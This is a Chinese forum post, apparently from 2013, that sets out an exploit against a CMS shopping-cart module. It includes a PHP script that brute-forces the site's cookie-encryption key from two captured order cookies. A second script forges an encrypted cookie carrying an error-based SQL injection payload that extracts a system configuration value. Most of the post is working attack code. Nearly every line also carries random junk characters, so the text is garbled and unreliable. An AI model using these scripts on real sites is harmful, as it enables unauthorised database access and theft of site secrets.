www.xxx.com/plus/search.php?keyword=! E8 z1 b( @& u7 X" N: N
在 include/shopcar.class.php中
) N9 C4 ?$ f2 c0 H. f先看一下这个shopcar类是如何生成cookie的
9 I. W" h: |9 ?5 J0 k" f239 function saveCookie($key,$value)
3 d4 b- U( o* ?. z, a' p; e& L# C240 { U4 o) t) | h4 l u5 z
241 if(is_array($value))
, ?& C7 L) Z/ V9 g/ i! k242 {
' Y1 A/ Z8 y/ f243 $value = $this->enCrypt($this->enCode($value));
) v5 }! b; |. a& W1 \& W244 }
?! }0 \6 b- J/ D+ P. S7 M; d245 else d# h+ o6 k4 K
246 {$ N+ ?3 d# q9 ]& I. u$ G
247 $value = $this->enCrypt($value);$ s5 G& Q, _( M% V0 C; w' s3 y
248 }$ g f7 }# j/ W
249 setcookie($key,$value,time()+36000,’/');
0 B. o- `/ V" f5 A5 ?- C& }250 }( V G" ?# Z$ Q; H9 l) r) L/ F
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数' X6 y+ T. k0 W, y9 X8 h* v8 q
186 function enCrypt($txt)
( ~. o+ U! H4 W% O# d187 {( } a1 k5 a# G
188 srand((double)microtime() * 1000000);
$ D7 g, V1 M+ A* r% W189 $encrypt_key = md5(rand(0, 32000));7 f7 z& q' X$ p4 v6 Q# f' ^5 s
190 $ctr = 0;
& `' E8 N) e U& h: }! _191 $tmp = ”;0 i j! O# `7 ^/ H1 A
192 for($i = 0; $i < strlen($txt); $i++)) m3 v7 j4 Z6 C$ @
193 {
: b0 S1 M1 k8 B4 O/ _# M194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;& X4 H1 S& _% a
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
2 n, N) c) M! G0 _# ~196 }" L* b/ |* r" c( o+ o+ l
197 return base64_encode($this->setKey($tmp));
7 D% ]3 U" y& Y7 m" W$ ^6 U198 }
2 C# O# ]* K/ z; {) R5 ]0 n# X213 function setKey($txt)& t8 b9 {1 J/ P! l
214 {
/ i% I8 g% J: C3 f* y/ U. o% g# |215 global $cfg_cookie_encode;9 j! l2 k0 S; ^/ [' U
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
# g( v+ M6 Y p. ?2 a. H1 \6 N/ ]217 $ctr = 0;5 }4 x+ c( V' g
218 $tmp = ”;
- [# a- ?7 V" H, l. D5 [' G; W219 for($i = 0; $i < strlen($txt); $i++)8 }7 g7 E W& ?+ n
220 {8 X) C9 v$ f9 \/ N& l
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ B' y9 s# W: M" s' `1 d222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
2 W7 e: s! {6 e, P5 b223 }4 [4 }& O0 ^/ I$ h: L1 f9 q
224 return $tmp;
2 n, f/ o. k6 i, t$ V; C$ w225 }
( B5 D4 y! J$ KenCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的* |6 p$ \9 Z. V& W: e% p. H7 a
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。3 E8 B2 P% a; T/ ~* G4 [' ?
具体代码如下:1 L' D5 N/ a4 D, w/ o/ u; d$ b
<?php) F6 {, t3 |# E. H/ Y. ~& _
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here( ~4 I# T1 ]$ b9 I/ ?' y
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
' f R1 T: [! w, L$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here$ s0 }$ r( }' `' x- V& C5 s
function reStrCode($code,$string)% h: _6 ~: H8 L
{
* E' ]0 I* Y: ~0 a& U# w+ H: U$code = base64_decode($code);
# o: P+ V" v, q) N/ c# s3 D$key = “”; E2 n ^; a$ q( {, E4 x( k n4 T, K8 z4 c
for($i=0 ; $i<32 ; $i++)3 R. K& F; c d) r0 p
{: q. K1 \9 ]2 H+ b3 B
$key .= $string[$i] ^ $code[$i];
7 J& _; G. }" P, t* e}6 Q0 V3 l) c& g( Z8 }. D
return $key;2 @* }9 X( T& f1 k' v3 S% k# _* r( L
}( A6 ~8 ~5 _8 r* q4 H [+ e& i& p* Z
function getKeys($cookie,$plantxt)
! C) k; c7 a+ H* h: @{
' D/ L+ ~( f3 r( J6 O# I$tmp = $cookie;6 Q1 j% k- O) h- w7 o# ~7 P
$results = array();
7 G) S& ~% D5 @" M1 ofor($j=0 ; $j < 32000; $j++) p9 z9 W9 u2 H
{
# S) A) `% |# g n7 Z$ @! I8 q- s1 O0 M, ^' k- S2 G
$txt = $plantxt;
2 {% R' r: p$ N5 ?8 E) u3 q$ctr = 0;
; R, U3 E! Z6 O5 u" r9 C$tmp = ”;1 k/ t, T( \ [) f% j6 ]; c
$encrypt_key = md5($j);
! D1 c. e. P2 [for($i =0; $i < strlen($txt); $i ++)
: `! r: A/ u" j{4 f! _2 E# F2 ?* l; Z( j3 p
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;# y. c8 [2 b% A4 |5 I
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
* T4 F1 o; Q9 X+ [}4 V; y) x6 z! w- N: W
$string = $tmp;
$ g9 g" P( n4 L' w ?4 i7 Q$code = $cookie;
) n8 z$ K3 @' }9 N. A4 ]" M9 o4 i$result = reStrCode($code,$string);
3 A" O" j' w4 f7 T" c Kif(eregi(‘^[a-z0-9]+$’,$result))1 v# q0 \& X# ~% H7 {1 W
{9 R; g6 y# f( I/ n: {
echo $result.”\n”;
, ~$ k; T" U5 S/ g1 K+ g$results[] = $result;
+ ^% p9 Z) O# K) s& z& J$ v8 N}
- R% a% H* Q. ~: A( f( @}
5 M6 }' L0 h5 W& a/ J; N0 ]return $results;4 C" w- w1 ~- v: e( v7 l
}
. ]* m8 x6 y5 a$ v2 T0 \, k$results1 = getKeys($cookie1,$plantxt);/ ^9 b3 N& l2 o. v) i& [; V
$results2 = getKeys($cookie2,$plantxt);% N# A. C4 ^: Q5 {/ x' Q. c, u4 m
print “\n——————–real key————————–\n”;% n# P8 s! m6 \% W, ^& m% x
foreach($results1 as $test1)
% L) i* w3 I$ y% R. `# j4 u{
- l, n: y, U$ c" E; F Vforeach($results2 as $test2)
# s: @* q0 p; M( v' D ]/ S* v* l{8 P; M! j3 I! ~) Q1 [ z5 Q
if($test1 == $test2)
4 w. ~$ }6 P% S2 k' D8 g4 E{
8 T. P4 b8 i1 u8 ~2 q0 e0 x G, |5 z, Cecho $test1.”\n”;. d- t# A' [- M* E9 j, y
}
: _- _0 f- h% ?& h' G}* w: T* U) C7 t- @( T9 P
}
+ g: Y0 z" W- W+ V0 H) C?>8 }5 j% W7 S S: i' p: I$ |! ]
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,1 A c4 `6 h8 P6 G% S( d* M
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1# S1 w, e$ |7 y) J+ O: X
然后推算出md5(strtolower($cfg_cookie_encode))
& g2 b3 \# K2 `得到这个key之后,我们就可以构造任意购物车的cookie
* ]' J( L' c- I( i; ^5 k) E/ o接着看( Y- Z, r' n7 G5 }
20 class MemberShops
( B8 Z- q" _0 i21 {8 e# A, B& G* N8 k
22 var $OrdersId; R2 Y) M" R( Z/ @4 v1 o
23 var $productsId;
* d) V: p7 B; y, a- M7 `24
8 a" q+ x/ A* Y! }25 function __construct()& \, @% T2 f/ P% n) }. E
26 {
% @8 C6 r5 S: ~5 K0 b, M27 $this->OrdersId = $this->getCookie(“OrdersId”);% R; Z2 I+ i: Q! i; |
28 if(empty($this->OrdersId))
# B" x& ~% G* Y3 q# O+ P Z+ Y/ l29 {. V4 L# m8 ^; M: a$ T
30 $this->OrdersId = $this->MakeOrders(); f6 n+ r& M$ k: C2 p4 L
31 }
5 a4 w6 H: Y& q8 S2 K3 n32 }: }4 R, ?3 q3 a8 H* V5 m# V- |
发现OrderId是从cookie里面获取的
; F: ?2 ]! E% L3 q7 q" l! n8 o然后) [: P4 ]! B% e% Z
/plus/carbuyaction.php中的
: ?$ b' g( t/ w- x' i( {29 $cart = new MemberShops();
( X4 A4 d- ]5 S7 p39 $OrdersId = $cart->OrdersId; //本次记录的订单号
; L; T& B2 l( i9 \4 T# Q……
. P7 ]$ |' _$ L. @3 m173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);% G( N6 a4 C# k }
接着我们就可以注入了
0 X+ t/ y" ~& G, g* n+ `通过利用下面代码生成cookie:+ z; W0 I. S2 c/ S6 m
<?php
0 W# c1 ]2 z8 T8 M$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
& I7 y2 [0 c5 p' H' `# B$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here" b# ~3 p0 U$ P5 U2 e! T+ f
function setKey($txt)* { I" h% C9 n4 F+ J/ c9 C
{$ j! E% \7 w' @7 l
global $encrypt_key;
2 ?' a) u) P4 ~ `, O' G1 G7 ?$ctr = 0;
% y5 M2 ~1 a7 w6 P/ e$tmp = ”;
_* [! K% z4 B' C1 Ufor($i = 0; $i < strlen($txt); $i++)
& _$ d4 |- a+ x6 g3 i5 q0 f{
- ~- d9 @% L0 f0 t& i/ p$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;8 c# a! v2 n6 @! E0 a8 K; l- P8 p
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];6 W) Z( r2 m- G2 O$ Z0 {* q
}1 g( P9 ^2 Z$ ?
return $tmp;
9 I. X( q( l: e2 ]# l Y}% s9 K8 _" ]0 a* r+ s8 s8 Q
function enCrypt($txt)
/ a' W* n0 x u; X- ?{
6 s: j2 h; ~* L% Isrand((double)microtime() * 1000000);
P( l9 V* c3 G$encrypt_key = md5(rand(0, 32000));! X0 @; A2 i( U9 f
$ctr = 0;
7 Z# U' f' y I- W7 z3 H/ v$tmp = ”;" f& W1 d* M+ v T2 q
for($i = 0; $i < strlen($txt); $i++)+ M8 y' f; }% |; l5 s
{$ F3 I) w" U) Q+ p. w
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
' z, s( \: ^1 R* S) s c3 H$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);8 o6 _: I- ~% \! L/ h
}7 T3 t' \) P8 @* N( ~$ D
return base64_encode(setKey($tmp));
! R A: k1 Y$ ]* q/ P}
, U5 b% a/ L7 U' F# _for($dest =0;$dest = enCrypt($txt);)
0 g& A) ~' q# |* `2 j$ s8 W{
' o0 p! e2 p* t: V. ~if(!strpos($dest,’+'))
2 c+ e9 P, V2 ^0 b{& w% m# J o$ X. r- S/ K
break;
1 s R* z8 ?1 L7 _ [}0 c$ T% A8 T6 B7 v& I
}
! F' }' R& l# zecho $dest.”\n”;
A/ R5 ^8 r: @! [/ h# u! s! \?>
Q0 X: c, a) U \2 y
' w2 L+ j! C$ u |
发表于 2013-2-13 23:58:29
收藏
支持
反对